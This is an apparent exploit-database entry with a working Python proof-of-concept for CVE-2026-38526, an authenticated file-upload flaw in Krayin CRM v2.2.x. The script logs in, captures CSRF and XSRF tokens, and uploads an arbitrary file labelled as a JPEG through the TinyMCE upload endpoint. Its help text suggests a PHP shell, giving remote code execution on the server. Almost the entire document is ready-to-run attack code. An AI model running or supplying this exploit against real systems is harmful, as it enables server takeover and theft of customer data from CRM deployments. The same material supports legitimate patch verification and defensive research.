Share
## https://sploitus.com/exploit?id=EDB-ID:52629
# Exploit Title:   Krayin CRM v2.2.x - Authenticated Remote Code Execution
# Date: 07/05/2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://krayincrm.com
# Software Link: https://github.com/krayin/laravel-crm
# Version: 2.2.x
# Tested on: Debian
# CVE : CVE-2026-38526


import asyncio
import httpx
from urllib.parse import * 
import argparse
from bs4 import BeautifulSoup
import json


async def main(url, user, password, file):
    async with httpx.AsyncClient(verify=False) as client:
        url_login = urljoin(url, "/admin/login")
        upload_url = urljoin(url, "/admin/tinymce/upload")
        get_tokens = await client.get(url=url_login)
        soup = BeautifulSoup(get_tokens.text, 'html.parser')
        _token = soup.find('input').get('value')
     
        login_data = {
            "_token": _token,
            "email": user,
            "password": password
        }

        login_r = await client.post(url=url_login, data=login_data)
        xsrf_token = login_r.cookies.get("XSRF-TOKEN")
        headers = {
            "X-XSRF-TOKEN": unquote(xsrf_token)
        }

        with open(file, 'rb') as o_file:
            r = await client.post(url=upload_url, files={"file": (o_file.name, o_file, "image/jpeg")}, headers=headers)
            if r.status_code == 200:
                exploit_url = r.json().get('location')
                print(f'[+] File uploaded successfully.\nPath to file: {exploit_url}')
            else:
                print('[-] File not uploaded.')

parser = argparse.ArgumentParser(description="Exploit for CVE-2026-38526, authenticated file upload.")

parser.add_argument('-t', '--target', required=True, help="Target url. E.g. http://127.0.0.1")
parser.add_argument('-u', '--user', required=True, help="Email.")
parser.add_argument('-p', '--password', required=True, help="Password.")
parser.add_argument('-f', '--file', required=True, help="File to upload (/home/user/shell.php).")

args = parser.parse_args()

if __name__ == '__main__':
    asyncio.run(main(args.target, args.user, args.password, args.file))